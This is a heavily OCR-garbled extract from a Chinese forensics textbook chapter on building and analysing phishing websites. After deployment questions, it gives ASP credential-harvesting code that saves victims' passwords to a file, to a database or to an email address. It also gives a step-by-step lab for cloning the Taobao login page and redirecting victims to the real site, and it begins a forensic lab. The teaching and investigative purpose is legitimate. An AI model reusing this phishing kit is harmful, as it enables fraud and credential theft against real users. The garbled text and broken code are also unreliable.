A. VBScript B. HTML C. JavaScript D. CSS 
(6) ASP. NET 程序 与 ASP 程序 有 ( ) 区 别 。 

A. 编程 模式 不 同 B. 编程 语言 不 同 

C. 运行 机 制 不 同 D. 源 代码 安全 性 不 同 
(7) 发 布 一 个 完整 的 ASP 网 站 通常 需要 以 下 ( ”“) 步 又 。 

A. 通过 IIS 发 布 网 站 B. 恢复 数据 库 

C. 配置 域名 D. 修改 数据 库 连接 参数 
(8) 在 ASP. NET 网 站 应 用 程序 中 常见 文件 扩展 名 为 ( Ss 

A. aspx.cs B. aspx | | || D. config 
2. 问答 题 


(1) 名 称 解释 : 虚拟 主机 、 虚 拟 目 录 。 
(2) 请 说 明 如 何 发 布 一 个 完整 的 ASP 网 站 系统 ? 


(3) 在 同一 物理 服务 器 上 配置 多 个 站 点 可 使 用 几 种 方法 ? 列举 每 种 方法 的 优 缺 点 。 


(4) 在 ASP 网 站 后 台 服 务 器 中 有 哪些 地 方 存 有 页 面 访 问 痕 迹 ? 
(5) ASP 网 站 的 发 布 过 程 与 ASP. NET 网 站 的 发 布 过 程 有 何不 同 ? 
(6) 如 何 确定 一 台 主 机 为 网 站 服务 器 ? 
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(7) 开机 状态 下 如 何 确 认 一 个 网 站 服务 器 发 布 了 哪些 网 站 ? 

(8) 如 何 快速 定位 网 站 的 源码 文件 所 在 位 置 ? 

(9) 如 何 快速 定位 网 站 的 访问 日 志文 件 所 在 位 置 ? 

(10) 假设 某 送 检 单 位 送 来 一 块 网 站 服务 器 硬盘 ,要 求 从 检 材 中 找到 与 案件 相关 的 网 
站 文件 ,但 该 硬盘 的 操作 系统 部 分 文件 损坏 ,系统 不 能 正常 启动 ,如 何 进行 查找 呢 ? 
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3 但 
办 3 辟 钩 鱼网 站 构建 与 分 析 


3 1 钓鱼 网 站 概述 


3.1.1 钓鱼 网 站 概念 


所 谓 钓鱼 网 站 是 不 法 分 子 利用 各 种 手段 做 出 的 诈骗 网 站 ,通常 与 银行 网 站 或 其 他 知 
名 网 站 几乎 完全 相同 ,仿冒 真实 网 站 的 URL 地 址 以 及 页 面 内 容 , 以 此 来 骗取 用 户 银行 或 
信用 卡 账号 、 密 码 等 私人 资料 。 钓鱼 网 站 近来 在 全 球 频繁 出 现 ,严重 地 影响 了 在 线 金融 服 
务 、 电 子 商 务 的 发 展 ,危害 公众 利益 ,影响 公众 应 用 互联 网 的 信心 。 


3.12 钓鱼 网 站 犯罪 现状 


根据 “瑞星 云 安全 ”系统 提供 的 数据 综合 分 析 ,2011 年 上 半年 中 国 互联 网 安全 领域 呈 
现 以 下 特征 : 

(1) 病毒 总 量 比 去 年 同期 上 升 25.2% 。 

(2) 挂 马 网 站 数量 比 去 年 同期 下 降 90% ,受害 网 民 的 数量 有 明显 下 降 。 

(3) 钓鱼 网 站 案例 急剧 增加 ,钓鱼 网 站 和 线 下 诈骗 广泛 结合 ,使 得 诈骗 者 的 犯罪 成 本 
急剧 下 降 , 跨 地 区 甚至 跨国 型 犯罪 增多 。 

(4) 手机 病毒 增加 , 安 卓 平台 成 为 未 来 黑客 与 病毒 肆虐 的 场所 。 

(5)“ 云 攻击 ”(Threats to Cloud) 正 在 变 成 现实 ,储存 了 大 量 用 户 资料 和 行为 的 “ 云 
提供 商 ”。 例 如 , 微 博 、 社 交 网 站 、 网 络 存 储 , 甚 至 包括 传统 的 电信 运营 商 和 酒店 业者 ,正在 
面临 前 所 未 有 的 安全 风险 。 


313 钓鱼 网 站 案例 增多 原因 


钓鱼 网 站 犯罪 为 何如 此 猩 狐 ? 究 其 原因 主要 有 以 下 三 方面 : 

(1) 仿冒 欺诈 钓鱼 类 网 站 危害 极 大 ,而 创建 这 些 欺 诈 钓 鱼网 站 的 成 本 却 非常 低 。 

首先 ,犯罪 分 子 要 制作 一 个 钓鱼 网 站 ,网 站 内 容 可 直接 从 官方 网 站 上 复制 ,只 需要 换 
换 IP, 换 换 域名 即 可 。 由 于 制作 一 个 网 站 的 成 本 很 低 , 造 假 者 使 用 假 身 份 证 花 几 百 元 很 
容易 申请 到 一 个 域名 ,并 租 到 服务 器 空间 。 

(2) 针对 证 券 .股票 .理财 等 财经 领域 的 钓鱼 网 站 危害 最 为 严重 ,这 些 网 站 以 所 谓 高 
收益 、 黑 马 、 潜 力 股 推荐 等 手法 ,欺骗 访问 者 注册 会 员 , 轻 则 骗取 会 费 。 一 个 活跃 的 钓鱼 网 
站 ,每 个 月 可 以 通过 各 种 渠道 获得 近 千 笔 的 非法 交易 , 非法 盘 利 可 以 达到 数 十 万 元 ,也 就 
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是 说 通过 钓鱼 网 站 能 轻松 获取 巨大 经 济 利益 。 

(3) 这 些 钓 鱼网 站 的 服务 器 大 多 托管 在 国外 ,网 站 的 相关 联系 人 ,一 般 位 于 北京 和 上 
海 。 通 常 一 个 钓鱼 网 站 在 网 上 的 生存 时 间 不 超过 一 个 月 ,有 的 只 存活 几 天 甚至 几 个 小 时 。 
多 数 钓鱼 网 站 为 逃避 相关 部 门 对 其 监控 和 取证 ,生命 周期 很 短 , 公 安 机 关 对 针对 此 类 案件 
进行 调查 取证 相应 的 办 案 成 本 很 高 。 


3.2 ”钓鱼 网 站 工作 流程 


不 法 分 子 利用 各 种 传播 途径 引诱 用 户 在 钓鱼 网 站 前 台 钓 鱼 页 面 输入 银行 卡号 、 
QQ 号码、 支付宝 账户 、 密 码 等 敏感 信息 。 当 用 户 单 击 “ 提 交 ” 按 钮 后 ,这 些 敏 感 数据 被 发 
送 到 黑客 精心 设计 的 后 台 处 理 模块 ,这 些 处 理 模块 可 根据 黑客 的 设置 通过 各 种 渠道 来 窃 
取信 息 , 如 保存 到 数据 库 特 定 表 中 。 黑 客 定期 从 网 络 服务 器 中 下 载 数据 库 文件 或 数据 库 
表 ; 直 接 通 过 邮件 发 送 到 指定 邮箱 中 ;或 发 送 到 指定 的 FTP 或 QQ 空间 中 ;也 可 直接 保存 
到 服务 器 文件 中 等 ,信息 处 理 流程 如 图 3-1 所 示 。 


前 台 钓鱼 页 面 


敏感 信息 


后 台 处 理 模块 


数据 库 ][ 邮件 ][ FTP | [ QQ ] … [文件 


图 3-1 钓鱼 网 站 信息 处 理 流程 


33 钓鱼 网 站 组 成 结构 


从 信息 处 理 流程 来 看 ,一 个 钓鱼 网 站 通常 由 以 下 4 部 分 组 成 。 
33.1 钓鱼 页 面 


钓鱼 页 面 与 官方 网 站 页 面 内 容 及 风格 一 致 ,大 多 从 官方 网 站 直接 复制 。 页 面 中 通常 
具备 一 个 重要 控件 表单 (Form) ,含有 让 用 户 录入 敏感 信息 的 输入 框 , 单 击 “ 确 认 ” 按 钮 之 
后 可 跳 转 到 特定 处 理 页 面 。 钓 鱼 表单 核心 代码 如 下 : 


< form name= “Torml”method“post”actior= “addl. asp “> 
《p> 用户 名 :< input type= “text” name= “name” size= 20> < /p> 
《py> 密码 :《 input type= “password” name= “pwd” size=20> 《</p> 
《p>《 input type= “submit”value= “确定 < /p> 
93 


网 站 构建 分 析 mm 


《/form 


可 以 看 出 , 当 用 户 单 击 “ 确 认 ” 按 钮 后 ,用 户 名 及 密码 信息 被 传递 到 服务 器 端的 add1. 
asp 页 面 中 。 


332 后 台 处 理 模 块 


钓鱼 网 站 窃取 敏感 信息 的 关键 在 于 后 台 处 理 模 块 的 设计 ,该 模块 首先 会 使 用 request 
对 象 从 “钓鱼 页 面 " 相 关 表单 中 提取 出 敏感 信息 ,然后 将 这 些 信息 通过 各 种 渠道 转移 保存 。 

(1) 若 将 信息 保存 在 服务 器 端的 某 个 特定 文件 中 , 则 addl. asp 文件 的 核心 代码 
如 下 : 


<% 
name= request. form( name’) "获取 用 户 名 
pwd= request. form( pwd’) "获取 密码 
set fso= server. Create0bject (Scripting.FileSysten0bject) 
"创建 文件 系统 对 象 实例 
fname= server. MapPath (user_” & name &“ txt) "文件 名 信息 
set srF fso. CreateTextFi le (fname, True) "生成 文本 文件 
sn. WriteLine name "向 文件 中 写 人 数据 
sn.WriteLine pwd 
sn.close 
%> 


< script language= “javascript > 

alert( 服 务 器 繁忙 ! 请 重新 登录 !) 

window. location= “http://Www. .x¥% “ 跳 转 到 官方 登录 界面 
< /script> 


(2) 若 将 信息 保存 在 服务 器 端的 Access 数据 库 中 , 则 addl. asp 文件 的 核心 代码 
如 下 


<% 
name= request. form( name”) "获取 用 户 名 
pwd= request. form( pwd”) "获取 密码 
Dimdb 
Set db= Server. Create0bject (ADODB. Connection) “创建 一 个 数据 库 连接 实例 


db. Open “Dbaq= “&Server. Wappath( /data/message.mdb )& :Driver= 
{Microsoft Access Driver (* .mdb)] 
“以 下 添加 新 记录 
StrSql= “Insert Into user (name, password) Values(” &name &”,"&pwd&”)” 
db. Execute (strSql) 
%> 
< script language= “ javascript’> 
alert( 服 务 器 繁忙 ! 请 重新 登录 !) 
Window 1ocationF= “http://Www. 关 关 关头- >*#¥¥"; “ 跳 转 到 官方 登录 界面 
< /script> 
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(3) 若 将 信息 发 送 到 特定 邮件 中 , 则 addl. asp 文件 的 核心 代码 如 如 下 : 


<% 
name= request. form( ‘name’) "获取 用 户 名 
pwd= request. form( pwd ) "获取 密码 
dim jmail 
set jmail= server. Create0bject ("jmai |. message’) "创建 发 送 邮 件 的 对 象 
jmail. silent= true "屏蔽 例外 错误 ,返回 false 跟 true 两 值 
jmail. logging= true “开启 日 志 功 能 
jmail. Charset= “gb2312” "邮件 的 文字 编码 为 国标 
jmail.fraF “fujiansenda 163.com "发 件 人 的 Email 地 址 
jmai |. ContentType= “text/html” “邮件 的 格式 为 HL 格式 
jmai |. addrecipient” fujianrecip® 163. cam "邮件 收 件 人 的 地 址 
jmail.subject= “钓鱼 信息 "邮件 的 主题 
str= "用户 名 :aname&' 密 码 : “8pwd "敏感 信息 字符 串 
jmail.body= str "邮件 的 内 容 
jmail.Send 用户 名 :密码 @ smtp. 163. com "发 件 人 邮箱 用 户 名 :密码 @ smtp 邮件 服务 器 
jmail. Close 0 "关闭 对 象 
% > 


< script language= “javascript > 

alert(' 服 务 器 繁忙 ! 请 重新 登录 叶 

Window locationF “Http:/AWmm Xx*¥¥. x”; " 跳 转 到 官方 登录 界面 
< /script> 


333 发 布 钓鱼 网 站 


完成 “钓鱼 页 面 " 和 后 台 处 理 模 块 后 ,不 法 分 子 接 下 来 要 将 钓鱼 网 站 发 布 出 去 ,让 人 们 
可 以 通过 互联 网 访问 钓鱼 网 站 。 


1. 申请 相识 域名 

攻击 者 通常 会 申请 一 个 与 被 仿冒 对 象 网 站 相似 的 域名 ,来 降低 人 们 的 警觉 性 。 一 些 
大 型 网 站 域名 极 易 被 混淆 ,以 淘宝 网 为 例 ,钓鱼 网 站 的 域名 往往 和 它 只 有 细微 的 差别 , 稍 
不 注意 就 会 上 当 受 骗 , 如 www. taobao. com 与 www. taoba0. com。 不 少 钓鱼 网 站 域名 通 
常 都 是 在 正规 网 站 域名 之 前 或 之 后 加 数字 、 字 母 或 带 横 杠 ,如 工商 银行 icbc. com. cn 与 
lcbc. com. cn, 中国 银行 bank-of-china. com 与 bank-off-china. com 等 。 也 有 一 些 钓鱼 网 
站 所 使 用 的 域名 为 被 仿冒 对 象 的 商号 .标识 或 其 他 与 被 仿冒 对 象 存在 高 度 对 应 关系 的 内 
容 ,如 银联 chinaunionpay. com 与 cnbank-yl. com。 


2. 申请 虚拟 主机 ,上 传 源 程序 
为 了 躲避 公安 机 关 侦 查 ,不 法 分 子 通常 会 选择 服务 器 托管 在 国外 的 虚拟 主机 服务 提 
供 商 。 首 先 在 服务 提供 商 的 网 站 注册 账号 ,按照 虚拟 主机 申请 向 导 填 写 一 些 个 人 信息 , 当 
然 通 常 这 些 信 息 不 是 真实 的 ,不 能 完全 作为 调查 的 依据 ,然后 需 填 人 所 申请 的 与 被 仿冒 网 
站 相似 的 域名 ,根据 服务 网 站 分 配 的 上 传 地 址 及 账户 通过 FTP 的 方式 来 上 传 钓鱼 网 站 源 
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码 到 服务 器 指定 目录 ,最 后 在 客户 端 通过 所 申请 的 域名 来 测试 网 站 内 容 。 


3. 推广 钓鱼 网 站 

在 互联 网 上 发 布 钓鱼 网 站 后 ,攻击 者 需要 利用 各 种 技术 手段 推广 钓鱼 网 站 ,让 更 多 的 
人 来 访问 钓鱼 网 站 ,以 获取 巨大 的 经 济 利益 。 目 前 网 上 活跃 的 钓鱼 网 站 的 传播 手段 主要 
有 以 下 8 种 : 

(1) 通过 QQ、MSN 阿里 旺旺 等 客户 端 聊 天 工具 发 送 传播 钓鱼 网 站 链接 。 

(2) 在 搜索 引擎 .中 小 网 站 投放 广告 ,吸引 用 户 点 击 钓鱼 网 站 链接 ,此 种 手段 被 假 医 
药 网 站 、 假 机 票 网 站 常用 。 

(3) 通过 E-mail .论坛 .博客 SNS 网 站 批量 发 布 钓鱼 网 站 链接 。 

(4) 通过 微 博 中 的 短 连接 散布 钓鱼 网 站 链接 。 

(5) 通过 仿冒 邮件 ,如 冒充 “银行 密码 重 置 邮 件 ”, 来 欺骗 用 户 进 入 钓鱼 网 站 。 

(6) 感染 病毒 后 弹出 模仿 QQ、 阿 里 旺旺 等 聊天 工具 窗口 ,用 户 单 击 后 进入 钓鱼 
网 站 。 

(7) 恶意 导航 网 站 .恶意 下 载 网 站 弹出 仿真 悬浮 窗口 , 单 击 后 进入 钓鱼 网 站 。 

(8) 利用 用 户 输入 网 址 时 易 发 生 的 错误 ,如 gogle. com sinz，com 等 ,一 旦 用 户 写 
错 , 就 误 入 钓鱼 网 站 。 


34 钓鱼 网 站 构建 实例 


本 节 通 过 实 训 的 方式 让 学 生 熟 悉 钓 鱼网 站 的 制作 过 程 ,以 便 更 好 地 分 析 钓 鱼网 站 。 
本 实 训 所 提供 资料 仅 供 教学 使 用 ,不 得 用 于 其 他 用 途 , 违 者 后 果 自 负 。 

【 实 训 3-1】 虚拟 机 Windows 2003 Server 作为 网 站 服务 器 ,其 IP 地 址 为 192. 168. 
157. 128 ,在 该 服务 器 上 构建 发 布 淘宝 钓鱼 网 站 ,窃取 淘宝 登录 用 户 名 及 密码 。 

构建 淘宝 登录 钓鱼 页 面 的 步骤 如 下 。 


1. 下 载 被 仿冒 页 面 

构建 钓鱼 网 站 或 页 面 的 最 快捷 方法 就 是 复制 ,在 客户 端 打开 IE、360 等 任 一 浏览 器 ， 
输入 淘宝 网 址 http://www. taobao. com, 打 开 淘 宝 主页 , 单 击 “ 登 录 ” 链 接 , 进 入 淘宝 登录 
页 面 ,如 图 3-2 所 示 ,在 该 页 面 下 选择 “文件 ”>“ 另 存 为 ”命令 ,打开 “保存 网 页 ”对 话 框 , 保 
存 位 置 设 定 为 d: \taobao, 文 件 名 指定 为 index, 保存 类 型 设 为 “文件 ,全 部 (*. htm; 
x .html)”, 单 击 “ 保 存 ” 按 钮 。 在 d:\taobao 下 可 见 index. htm 文件 及 index. files 文件 
夹 ,该 文件 夹 包括 3 个 图 片 文件 .1 个 css 文件 及 3 个 js 文件 共 7 个 文件。 

2. 下载 背 景 图 片 

在 淘宝 登录 页 面 中 的 账户 名 登录 框 处 使 用 了 多 个 背景 图 片 ,而 通过 “文件 ”>“ 另 存 
为 ”方式 下 载 网 页 并 不 能 将 网 页 制作 过 程 中 所 使 用 的 背景 图 片 一 并 保存 到 本 地 ,需要 单独 
下 载 背 景 图 片 。 在 登录 框 的 左上 角 处 右 击 ,在 弹出 的 快捷 菜单 中 选择 “背景 男 存 为 ”命令 ， 
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保存 box_bg. png 文件 到 本 机 d:\taobao\index. files 文件 夹 下 ,同样 在 登录 框 横 线 处 下 
载 stuff. png 背景 图 片 .在 登录 框 下 虚 影 处 下 载 visitor_bg. png 背景 图 片 保存 到 本 机 d:\ 
taobao\index. files 文件 夹 下 。 


当 沟 宝 网 - 沟 我 喜欢 ! - 了 icrosoft Internet Explorer 
文件 四 蝙 辑 区 ) 查看 WD 收藏 和 工具 帮助 虽 


Bm- 日 -四 四 的 Per 妆 wax 如 | 会 -如 目 - 口 网 角 电 


她 让 0) | 全 https://1ogin taobao. com/menber/locin jhtal?f=topAr edirectURL=httpX3A2P XOP rr. taobas_coay2F 


账户 名 | 手机 号 /会 员 名 /邮箱 


En 
我 和 -5M 菠 ， 加 eM 


圾 本 从 -条 2H 激 染 ) 
刚刚 医 王 一 =es 


图 使 用 手机 号 码 登 录 | 免费 注册 


淘宝 专职 卖家 
淘宝 开店 时 间 : 3 年 


| 
加 国 Iaternet 


图 3-2 淘宝 登录 页 面 


3. 修改 网 页 中 背景 图 片 引 用 路 径 

尽管 已 经 下 载 了 背景 图 片 ,但 是 在 本 机 打开 index. htm 文件 时 ,并 没有 看 到 官方 网 站 
的 显示 效果 ,所 下 载 的 背景 图 片 均 未 显示 ,需要 手工 修改 网 页 文件 中 的 背景 图 片 的 引用 路 
径 。 具 体操 作 步 骤 如 下 : 

Q@ 确定 背景 图 片 引用 路 径 所 在 位 置 , 见 d:;\taobao\index. files 文件 夹 中 的 full-pkg- 
min. css 文件 。 

@ 在 层 释 样式 表 文 件 中 搜索 stuff. png、box_bg. png visitor_bg. png 关键 字 ,可 见 这 
些 图 片 的 引用 均 来 自 于 该 文件 所 在 目录 的 上 层 文件 夹 中 的 img 子 文件 夹 中 ,如 “../img/ 
stuff. png”“../img/box_bg. png” 等 。 

@ 可 以 在 d:\taobao 中 建立 img 文件 夹 ,把 stuff. png、box_bg. png 等 图 片 复制 到 该 
文件 夹 内 ;或 将 full-pkg-min. css 文件 中 所 有 关于 stuff. png、box_bg. png 等 背景 图 片 的 
引用 路 径 改 为 当前 有 效 的 图 片 路 径 。 


4. 发布 钓鱼 网 站 

经 过 前 三 个 步 又 后 ,已 经 将 被 仿冒 网 站 页 面 完 全 复制 到 本 地 ,修改 背景 图 片 引用 路 径 
后 ,使 得 d:\taobao 文件 夹 中 的 index. htm 网 页 显示 效果 与 被 仿冒 网 页 一 致 , 接 下 来 将 
d:\taobao 文件 夹 上 传 到 网 站 服务 器 , 即 虚拟 机 Windows 2003 Server 中 ,在 IIS 中 创建 网 
站 taobao ,指定 网 站 主 目 录 为 c:\taobao, 具 体 发 布 网 站 步骤 参见 2. 1.2 节 。 在 客户 机 上 
通过 IP 地址 192. 168. 157. 128 即 可 访问 所 发 布 的 钓鱼 网 站 。 
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5. 创建 后 台 处 理 模 块 
前 面 所 发 布 的 钓鱼 网 站 ,仅仅 是 与 官方 网 站 内 容 及 风格 上 一 致 ,能 够 迷惑 网 民 来 访问 


该 网 站 ,但 是 并 不 具备 盗 取信 息 功能 ,需要 实现 后 台 处 理 模 块 ,提取 用 户 在 钓鱼 页 面 输入 
的 用 户 名 及 密码 ,通过 各 种 渠道 将 信息 固定 保存 。 例 如 , 若 采 用 在 服务 器 创建 文件 来 保存 
信息 , 则 在 网 站 服务 器 c:\taobao 下 创建 add. asp 文件 ,内 容 为 : 


<% 
name= request. form( TPL_username ") "获取 用 户 名 
pwd= request. form(TPL_password ) "获取 密码 
set fso= server. Create0bject (Scripting. FileSystem0bject) 
"创建 文件 系统 对 象 实例 
fname= server. WapPath(user “ & name &“txt) 文件 名 信息 
set srF fso CreateTextFi le (fname, True) "生成 文本 文件 
sn WriteLine name “向 文件 中 写 入 数据 
sn. Wr iteLine pwd 
sn.close 
%> 


< script language= “ javascript > 

alert( 服 务 器 繁忙 ! 请 重新 登录 !) 

window. location= https://login. taobao. commenber/login. jhtml? f= top&redirectURL= http% 3A% 2F% 2Fww. 
taobao. canf 2F”; “ 跳 转 到 淘宝 官方 登录 界面 
< /script> 


注意 : 文件 中 使 用 request 对 象 来 获取 前 一 个 网 页 中 form 控件 里 名 为 TPL_ 


username 和 TPL_password 输入 框 的 值 ,需要 与 实际 钓鱼 页 面 中 用 户 名 及 密码 输入 框 名 
称 相对 应 ,并 且 为 了 隐蔽 窃取 信息 ,通常 在 最 后 弹出 一 个 提示 信息 ,如 “服务 器 繁忙 1 请 重 
新 登录 1”, 然 后 通过 location 方法 将 用 户 的 浏览 器 定位 到 被 仿冒 的 官方 网 址 上 ,让 用 户 进 
行 正常 的 登录 操作 ,达到 麻痹 用 户 的 目的 。 


6. 修改 “钓鱼 页 面 ”, 使 其 跳 转 到 后 人 台 处 理 页 面 
在 网 站 服务 器 内 找到 钓鱼 页 面 index. htm, 定 位 到 该 页 面 中 对 应 的 用 户 名 及 密码 输 


入 表单 代码 段 如 下 所 示 : 
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< FORM id J_StaticForm actiorF https://login. taobao. cowmenber/login. jhtml 
method= post> 

《DIV class= “field ph- hide username- field >《 LABEL for= TPL_username_1> 账户 名 
《/LABE> 

《SPAN class= phr label> 手机 号 /会 员 名 /邮箱 < /SPAN> < INPUT class= “login- text 
J_UserName” 

id= TPL_username_1 tablndex= 1 maxl ength= 32 name= TPL_username> < /DIV> 

《DIV class= field> < LABEL id password- label> 密 码 < /LABEL> < SPAN 

id= J_StandardPwd> < INPUT class= logirr text id= TPL password_1 tablndex= 2 

type= password maxLengthF 20 neme= TL password aria- |abel ledby= “password- label > 
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修改 form 控件 中 的 action 属性 值 为 add. asp, 使 用 户 在 index. htm 页 面 输入 用 户 名 
及 密码 后 , 单 击 登 录 按 钮 后 会 自动 跳 转 到 后 台 处 理 页 面 add. asp, 修 改 后 代码 如 下 : 


< FORM id J_StaticForm actiorr add asp 

method= post> 

《DIV class= “field ph- hide username- field”> < LABEL for= TPL_username_1> 账户 名 
《/LABB > 

《SPAN class= ph- label> 手机 号 /会 员 名 /邮箱 < /SPAN> < INPUT class= “login- text 
J_UserName” 

id= TPL_username_1 tablndex= 1 maxLengthF 32 name= TPL_username> < /DIV> 

《DIV class= field> < LABEL id= password- label> 密 码 < /LABEL> < SPAN 

id= J_Standardpwd> < INPUT class= logirr text id= TPL_password_1 tablndex= 2 

type= password max engttF: 20 name= TPL_password ariar label ledby= “password- label> 


7. 测试 
首先 ,在 客户 端 通过 IP 地 址 访问 所 搭建 的 钓鱼 网 站 ,输入 用 户 名 密码 ,如 图 3-3 
所 示 。 


EE - 淘 我 喜欢 ! - 了 icrosoft Internet Explorer 
文件 中 ”编辑 E) 查看 中 收藏) 工具 CI) 帮助 00 


@ 右 -日 - 国 国 的 记 轨 六 mx 回合- 各国 - 口 网 级 总 


地 址 加 ) | 忽 ] http://192. 168.157. 128/ 


我 昌 和 -3M 梯 ， 国光 入 


和 六 op) 


ee 
3 
wi 图 使 用 手机 号 码 登 录 | 免费 注册 


全 国 Internet 


图 3-3 淘宝 登录 钓鱼 页 面 


单 击 “登录 ”按钮 ,弹出 信息 提示 框 , 如 图 3-4 所 示 。 
单 击 “ 确 定 ” 按 钮 后 ,浏览 器 被 重新 定位 到 淘宝 官方 登录 页 
面 ,可 进行 正常 的 访问 操作 。 

最 后 ,在 IP 地 址 为 192. 168. 157. 128 的 网 站 服务 器 
主 目录 c:\taobao 内 可 见 新 文件 “user_ 迷 糊 小 人 . txt” 如 
图 3-5 所 示 。 打 开 该 文件 可 见 用 户 在 “钓鱼 页 面 2 输入 的 
用 户 名 及 密码 。 


图 3-4 “服务 器 繁忙 "对话 框 
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文件 四 ”编辑 E) 查看 WW) 收藏 和 ) 工具 CI 帮助 只 
回忆 -日 -六 | 吕 搜索 | 咏 文 人 天 | 今 XX 史 | 加 
地 址 加 | 己 c:\taobao 
文件 夹 X | 名称 ~ I 大 小 [类 型 修改 日 期 
国 旧 面 局 ine 文件 亚 2012-3-1 13:50 
加 我 的 文档 Dindex. files 文件 夹 ote 3-1 13:50 
日 显 我 的 电脑 多 inae htm 18 KB HINL Docunent 
田 唱 35 软盘 &) 1 玛 ASP 文件 
日 过 本 地 碰 盘 (C:) 1 玛 文本 文档 


图 3-5 ”新 建文 件 “user_ 迷 糊 小 人 . txt” 


3.9 的 鱼网 站 实例 分 析 


【 实 训 3-2】 在 Windows XP 虚拟 机 内 发 布 有 一 个 钓鱼 网 站 ,在 本 机 以 host-only 方 
式 启动 该 虚拟 机 服务 器 ,访问 虚拟 机 所 发 布 的 钓鱼 网 站 ,对 钓鱼 网 站 进行 分 析 , 确 定 被 盗 
数据 流向 。 


35.1 确定 主机 为 网 站 服务 器 


如 何 能 快速 确定 某 主机 为 网 站 服务 器 ? 每 种 服务 都 有 其 默认 的 监听 服务 端口 ,对 于 
网 站 服务 来 说 ,其 默认 端口 为 80 或 8080。 在 侦查 时 ,只 需 使 用 netstat 命令 查看 当前 主 
机 是 否 开放 了 相应 默认 端口 即 可 。 在 该 实例 中 .具体 做 法 如 下 : 

在 本 机 以 host-only 方式 启动 E:\windows-kdty 下 的 虚拟 机 服务 器 ,进入 系统 后 可 
知 虚 拟 机 所 安装 的 操作 系统 为 Microsoft Windows XP Professional 版 本 2002 Service 
Pack 2 ,在 桌面 选择 “开始 ”一 运行 ”~~cmd 命令 ,打开 DOS 命令 运行 窗口 ,输入 “netstat 
an” 命 令 ,结果 显 示 机 开放 了 80 端口 ,正在 监听 该 端口 ,如 图 3-6 所 示 , 即 可 确定 该 主机 
为 网 站 服务 器 。 


Foreign hddress 


8.9.9.9 


LISTENING 


图 3-6 ”服务 器 网 络 连接 情况 


352 确定 网 站 源码 所 在 目录 


根据 主机 所 安装 的 操作 系统 为 Windows 系列 ,猜测 Web 服务 器 软件 可 能 是 IS 和 
Tomecat ,并 且 在 操作 系统 内 找到 了 IIS 管理 器 ,在 Internet 信息 服务 窗口 内 可 见 其 发 布 了 
一 个 默认 网 站 ,通过 查看 属性 可 见 “ 默 认 网 站 ”对 应 的 网 页 源码 所 在 目录 为 E:\aaa, 如 
图 3-7 所 示 。 也 就 是 说 ,网 站 的 源 代码 文件 都 存放 在 本 地 的 E:\aaa 目录 下 。 
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网 站 “| ISAPI 第 渤 器 | 主 目录 [文档 | 目录 安全 性 ITP 头 | 自 定义 酉 误 | 
i 


直上 的 目录 O) 
O09- 台 计算 机 上 的 共享 &) 
加重 定向 到 VRL 


本 地 路 径 吕 : |[E:\aas 

脚本 资源 访问 站 ) 记录 访问 WO 
辐 读 取 双 ) 索引 资源 加 ) 
写 入 @) 

目录 浏览 @) 

应 用 程序 设置 

应 用 程序 名 册 :| 菊 认 应 用 程序 

开始 位 置 全 认 网 站 > 


执行 权限 到 ) 纯 脚本 国人 eesesr 
应 用 程序 保护 思 : ”| 中 民用 ) ~ 


图 3-7 钓鱼 网 站 主 目录 


353 定位 可 疑 “ 钓 鱼 页 面 ” 


要 想 找 到 被 盗 取 数 据 的 最 终 流转 去 向 ,首先 要 从 盗 取 这 些 数 据 的 可 疑 “ 钓 鱼 页 面 ”着 
手 , 即 定位 网 站 的 “钓鱼 页 面 "?。 可 以 通过 访问 浏览 “钓鱼 网 站 ”各 个 页 面 ,根据 “钓鱼 页 面 ” 
特征 ,来 确定 可 疑 “ 钓 鱼 页 面 ”。 

通常 “钓鱼 页 面 ”主要 具有 以 下 特征 : 

(1) 涉及 让 用 户 输入 敏感 数据 ,如 用 户 名 、 密 码 .资金 账户 等 

(2) 与 某 知名 网 站 在 结构 .内 容 等 方面 极其 相似 ,但 是 页 面 上 有 些 链接 却 不 能 正常 
使 用 。 

(3 六 钓鱼 页 面 ? 的 域名 与 被 仿冒 官方 页 面 域名 极其 相似 , 仅 存在 细小 差别 。 

(4)“ 钓 鱼 页 面 " 中 敏感 数据 输入 框 被 动 持 ,在 “钓鱼 页 面 "输入 数据 之 后 , 单 击 “ 提 交 ” 
按钮 后 发 生 页 面 跳 转 异常 , 即 发 生 多 次 跳 转 或 所 跳 转 到 的 页 面 在 域名 及 结构 内 容 方 面 与 
某 官 方 网 站 极其 相似 。 

在 本 实例 中 ,定位 可 疑 “ 钓 鱼 页 面 ? 步 又 如 下 。 


1. 要 想 访问 “钓鱼 网 站 ”, 先 弄 清楚 “钓鱼 网 站 ”的 访问 地 址 
在 虚拟 机 服务 器 通过 ipconfig 命令 查看 IP 地 址 信息 , 即 192. 168. 157. 128, 如 图 3-8 
所 示 。 


2. 实验 环境 下 ,保证 本 机 与 “钓鱼 网 站 ”服务 器 网 络 上 的 连通 性 

因为 虚拟 机 采用 的 是 host-only 联网 方式 ,虚拟 机 与 客户 机 之 间 通 过 本 机 的 VMware 
Network Adapter VMnetl 网 卡 进行 通信 ,因此 要 想 在 客户 机 浏览 钓鱼 网 站 ,需要 修改 
VMware Network Adapter VMnetl 网 卡 IP 地 址 使 其 与 虚拟 机 IP 地 址 唯 于 同一 网 段 ,如 
192. 168. 157. 1 。 
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Cs NDOWS\system32\cnd. exe 


图 3-8 服务 器 IP 地 址 信息 


3. 在 客户 端 访问 “钓鱼 网 站 ” 

钓鱼 网 站 的 其 主页 如 图 3-9 所 示 。 

EIT TE 

文件 E) ” 锭 辑 (E) ”查看 (V) 收 羡 (A) 工具 (DD 帮助 

中 -加 - 剖 国 区 搜索 “收藏 天 如 - 马 国 - 

她 址 (B) | 区 ] htp:/192 可 避风 |] 全 


你 现在 所 在 的 位 置 : 成 同 首页 
YI 客户 大 外 龟 公司 简介 FE 
帐号 要 
密码 
提交 。 重要 
评价 调查 
你 是 如 何 知 亲本 站 的 所 重要 提示 Fe 加 


图 3-9 钓鱼 网 站 主页 面 


通过 浏览 网 站 发 现 这 是 一 个 快递 公司 官方 网 站 的 仿冒 网 站 ,在 主页 上 是 公司 简介 、 新 
闻 链 接 等 信息 ,并 提供 VIP 客户 查 单 功能 。 另 外 还 有 “公司 简介 ”“ 服 务 范围 “在 线 快 
递 ”“ 快 件 查 询 ”“ 招 聘 信 息 ”5 个 子 栏目 。 

4. 定位 可 疑 “钓鱼 页 面 ” 

根据 “钓鱼 页 面 ?特征 ,通常 要 包含 输入 框 , 让 用 户 输 入 敏感 信息 便于 在 后 台 进 行窃 
取 , 根 据 这 一 原则 ,对 网 站 上 所 有 输入 框 进行 排查 ,发 现在 “在 线 快递 ” 子 栏目 下 的 “产品 订 
